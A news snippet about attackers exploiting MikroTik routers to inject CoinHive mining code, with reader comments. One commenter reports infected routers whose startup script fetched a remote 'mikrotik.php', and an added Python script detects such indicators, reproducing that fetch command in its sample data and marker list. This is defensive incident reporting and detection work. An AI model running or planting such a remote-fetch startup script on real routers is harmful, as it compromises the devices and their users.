MikroTik routers grab their pickaxes, descend into the crypto mines

Researchers have found thousands of MikroTik network routers in Brazil serving up crypto-coin-crafting CoinHive code. Trustwave researcher Simon Kenin said this week one or more attackers have exploited a known vulnerability in Mikrotik's enterprise routers to inject error pages with code that uses visitors' machines to mine …

  1. D.U.B

    Do not know if it is related to this particular botnet, but I found a local WISP I help from time to time had some hacked Mikrotiks.

    Symptoms were as follows:

    RouterOS version 6.34.x or lower

    Multiple outbound connections to ports 8291 (WinBox) and 7547 (tr069)

    socks proxy enabled

    system scheduler set to run script on startup

    contents of script were:

    /tool fetch address= port=2008 src path=/mikrotik.php

    Found said php file in files on infected Mikrotiks

    Stopped digging at that point and informed WISP, and helped to mitigate the issue.

    Also found similar traffic on a second local WISP, informed them as well.

    I was very concerned because these were both my main and backup internet connections.

    Upon further investigation I found similar traffic coming in from upstream of my #1 provider, informed the carrier who delivers backbone to both providers a week ago.

    Still getting hit pretty hard with incoming traffic that matches the pattern, firewall rules I set up on WISP #1 main router holding for now...

    Southwest Colorado USA
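The indicators D.U.B lists above (RouterOS 6.34.x or lower, SOCKS proxy enabled, a startup scheduler entry that fetches a remote script, and a burst of outbound connections to 8291 and 7547) can be checked mechanically. The script below is an added example, not code from the commenter or from MikroTik: it runs those checks over a constructed excerpt in the style of a RouterOS `/export` and `/system resource print`, plus constructed connection-tracking lines. The section names, the `REDACTED` address placeholder and the scan threshold of three connections are assumptions for the sample; adapt them to the real export format of the device under review.

```python
"""Triage a RouterOS export and a connection listing for the indicators
described in the comment above. All sample data here is constructed."""
import re
from collections import Counter

SUSPECT_PORTS = {8291, 7547}                       # WinBox and TR-069, per the comment
SCRIPT_MARKERS = ("/tool fetch", "mikrotik.php", "port=2008")

# Constructed excerpt: one line as printed by `/system resource print`,
# followed by text in the style of `/export`. The address is a placeholder.
SAMPLE_EXPORT = """\
version: 6.34.2 (stable)
/ip socks
set enabled=yes port=1080
/system scheduler
add interval=0 name=U6 on-event="/tool fetch address=REDACTED port=2008 src-path=/mikrotik.php" start-time=startup
"""

# Constructed lines approximating `/ip firewall connection print` output.
SAMPLE_CONNECTIONS = """\
src-address=192.168.88.1:52011 dst-address=203.0.113.10:8291 protocol=tcp
src-address=192.168.88.1:52012 dst-address=203.0.113.11:8291 protocol=tcp
src-address=192.168.88.1:52013 dst-address=203.0.113.12:7547 protocol=tcp
src-address=192.168.88.1:52014 dst-address=198.51.100.5:443 protocol=tcp
src-address=192.168.88.1:52015 dst-address=203.0.113.13:8291 protocol=tcp
"""


def section(export: str, name: str) -> str:
    """Return the body of the export section that starts with `name` (e.g. '/ip socks')."""
    m = re.search(rf"^{re.escape(name)}\n(.*?)(?=^/|\Z)", export, re.MULTILINE | re.DOTALL)
    return m.group(1) if m else ""


def parse_version(export: str):
    """Return (major, minor) from a 'version: 6.34.2 (stable)' line, or None if absent."""
    m = re.search(r"^version:\s*(\d+)\.(\d+)", export, re.MULTILINE)
    return (int(m.group(1)), int(m.group(2))) if m else None


def socks_enabled(export: str) -> bool:
    """True when the '/ip socks' section sets enabled=yes."""
    return "enabled=yes" in section(export, "/ip socks")


def startup_fetch_scripts(export: str):
    """Scheduler entries that run at startup and look like a remote-script fetch.
    An entry is flagged when at least two of the markers appear in its on-event body."""
    hits = []
    for line in section(export, "/system scheduler").splitlines():
        if line.startswith("add") and "start-time=startup" in line:
            event = re.search(r'on-event="([^"]*)"', line)
            body = event.group(1) if event else line
            if sum(marker in body for marker in SCRIPT_MARKERS) >= 2:
                hits.append(body)
    return hits


def outbound_port_counts(conn_lines: str, ports=SUSPECT_PORTS) -> Counter:
    """Count connections whose destination port is one of the suspect ports."""
    counts = Counter()
    for line in conn_lines.splitlines():
        m = re.search(r"dst-address=\S+:(\d+)", line)
        if m and int(m.group(1)) in ports:
            counts[int(m.group(1))] += 1
    return counts


def triage(export: str, conn_lines: str, scan_threshold: int = 3) -> dict:
    """Combine the four indicators into one findings dict with a simple 0-4 score."""
    ver = parse_version(export)
    findings = {
        "old_routeros": ver is not None and ver <= (6, 34),
        "socks_enabled": socks_enabled(export),
        "startup_fetch_scripts": startup_fetch_scripts(export),
    }
    counts = outbound_port_counts(conn_lines)
    findings["scanning_ports"] = sorted(p for p, n in counts.items() if n >= scan_threshold)
    findings["score"] = (int(findings["old_routeros"]) + int(findings["socks_enabled"])
                         + int(bool(findings["startup_fetch_scripts"]))
                         + int(bool(findings["scanning_ports"])))
    return findings


if __name__ == "__main__":
    for key, value in triage(SAMPLE_EXPORT, SAMPLE_CONNECTIONS).items():
        print(f"{key}: {value}")
```

On the constructed sample every indicator fires and the score is 4; a clean device on a current release with SOCKS disabled and no startup fetch would score 0. The connection-count threshold is the noisy part: a single router legitimately managed over WinBox will show a few 8291 connections, so tune it against what the WISP's own management traffic looks like before alerting on it.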

  2. Hermann

    Coinhive is so 2017

    Would be curious to see the ROI of this attack, every *decent* antivirus or adblocker now block Coinhive scripts

  3. Walter Bishop

    ‘RouterOS is MikroTik's stand-alone operating system based on linux v3.3.5 kernel. The following list shows features found in the latest RouterOS release:’

